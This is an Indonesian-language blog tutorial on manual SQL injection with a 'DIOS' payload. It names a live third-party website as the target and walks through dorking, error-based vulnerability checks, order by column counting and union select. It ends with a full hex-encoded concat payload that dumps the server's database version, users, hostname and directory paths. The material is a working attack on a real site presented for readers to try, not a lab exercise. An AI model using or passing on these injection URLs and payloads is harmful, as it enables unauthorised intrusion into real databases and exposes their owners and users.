Tutorial SQL Injection Manual (with Dios)

SQL Injection Manual With Dios


Sebelum next ke tutorialnya.
Layaknya Kamu mengetahui dahulu, Apa itu SQL Injection? SQL Injection adalah salah Satu teknik hacking yang biasa digunakan untuk mendapatkan database sebuah website, dengan menyisipkan perintah-perintah melalui URL Yang memanfaatkan BUG
yang disebabkan Oleh salah code.

Langsung Saja Kita ke tutorialnya :
Bahan" :
- Dork ( Klik disini )
- Dios ( Touch here!! )
- TUTORIAL MEMBUAT DIOS >>Disini<<
- Internet pastinya, ya kali kalian browsing gak Memakai internet.

1. Dorking dulu memakai dork Yang Sudah saya kasih. pilih target yang Kalian mau, Live Target Saya yang mudah dulu saja, cocok buat kalian coba juga.

LIVE Target : http://iagcc.com

2. Kamu Pilih dan klik, Seperti ini :
http://iagcc.com/news.php?id=58
( BELAKANGNYA TAMBAH ' ) Untuk cek vulnerable website
Jadi Seperti ini :
http://iagcc.com/news.php?id=58'

3. Setelah itu jika website tersebut vuln akan muncul Tulisan "You have an error in your SQL syntax" .

4. Next lalu Kita Tambahkan +order+by+1--+-- dibelakang Nomor id website
Jadi Seperti ini :
http://iagcc.com/news.php?id=58+order+by+1--+-- Terus kalian dari order by 1 Sampai Ketemu error websitenya, order+by+1--+-- , order+by+2--+-- Terus aja, sampai Ketemu Tulisan "Unknown column '8' in 'order clause' "

5. Dikarenakan Saya bertemu erornya dikolom +order+by+7--+-- maka kita ke  +union+select nya sampai angka 6 saja.
Seperti ini :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,4,5,6--+--
( NOTE : Tambahkan min (-) di belakang Nomor id nya )

7. Lalu disitu muncul Nomor ajaibnya, disitu angka "4"


maka Kita letakkan diosnya di angka "4"
Seperti Ini :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,concat+(0x3c696d67207372633d2268747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d766e6e50465659786669492f584c4831747532707953492f41414141414141414156672f54626a6e4964526f74786f666b414b48756b766830455f425630525f54396a4641434c63424741732f73313630302f32303139303431335f3231343231312e706e67223e2c3c62723e2c3c68313e496e6a6563746564206279202e2f4b3478633064333c2f68313e2c3c62723e,version(),0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,@@hostname,0x3c62723e,@@tmpdir,0x3c62723e,@@datadir,0x3c62723e,@@basedir,0x3c62723e,schema(),0x3c62723e,session_user(),0x3c62723e,UUID(),0x3c62723e,current_user(),0x3c62723e,system_user(),0x3c62723e,@@GLOBAL.have_symlink,0x3c62723e,@@GLOBAL.have_ssl),5,6
Maka Berhasil :)
Selamat Mencoba .
#SHARE
#NolifeTech

( Dilarang mencopy/paste tutorial Jika tidak meletakkan sumber ~ terimakasih ~ )

Subscribe to receive free email updates:

0 Response to "Tutorial SQL Injection Manual (with Dios)"

Posting Komentar

//